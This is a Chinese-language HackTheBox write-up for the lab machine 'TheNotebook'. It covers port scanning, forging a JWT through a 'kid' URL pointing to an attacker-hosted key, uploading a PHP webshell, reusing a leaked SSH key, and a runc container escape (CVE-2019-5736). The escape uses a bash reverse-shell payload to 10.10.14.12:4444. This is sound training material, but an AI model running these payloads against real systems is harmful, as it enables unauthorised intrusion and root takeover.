TheNotebook - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/320

• 10.10.10.230

端口扫描

22和80:

$ nmap -sC -sV 10.10.10.230
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-08 14:21 CST
Nmap scan report for 10.10.10.230
Host is up (0.068s latency).
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds

80

The Notebook,有注册和登录：

JWT

随意注册登录，可以发现是jwt，并且注意jwt中kid参数，另外注册的普通用户admin_cap是0，应该就是需要攻击JWT成为admin：

jwt to admin

所以可以自己生成一对公私钥，去JWT.io修改参数，粘贴公私钥，生成jwt：

(Jwt的key server应该要一直开着，因为发现每次请求都会有一次对key的请求)

ssh-keygen -t rsa -b 4096 -m PEM -f jwtRS256.key
# Don't add passphrase
openssl rsa -in jwtRS256.key -pubout -outform PEM -out jwtRS256.key.pub
cat jwtRS256.key
cat jwtRS256.key.pub

# header
{
  "typ": "JWT",
  "alg": "RS256",
  "kid": "http://10.10.14.12:7777/jwtRS256.key"
}

# data
{
  "username": "miao",
  "email": "miao@test.com",
  "admin_cap": 1
}

admin panel

Admin可以上传文件，可以直接上传php，得到webshell：

backup

然后通过已有shell翻文件，发现一个home.tar.gz(为了方便操作用的蚁剑shell，蚁剑牛逼):

下载下来后解压发现就是noah用户的home目录备份，里面得到ssh密钥：

user flag

然后直接使用这个私钥ssh登录noah用户，得到user.txt:

提权信息

Sudo -l发现只有通过docker操作特定容器的权限，那应该是考察docker逃逸了：

docker逃逸 && root flag

就是runc逃逸：

• https://github.com/Frichetten/CVE-2019-5736-PoC

修改payload，编译上传，触发执行：

var payload = "#!/bin/bash \n bash -i &>/dev/tcp/10.10.14.12/4444 <&1"

# 编译
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

# 另一个终端里去触发
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

另一个终端去触发：

触发后执行payload，逃逸成功，得到root.txt:

参考资料

• https://github.com/cdk-team/CDK/wiki/CDK-Home-CN
• https://github.com/Frichetten/CVE-2019-5736-PoC
• TheNotebook - Page 2 | RaidForums
  https://raidforums.com/Thread-TRADING-TheNotebook?page=2
• TheNotebook writeup | RaidForums
  https://raidforums.com/Thread-Tutorial-TheNotebook-writeup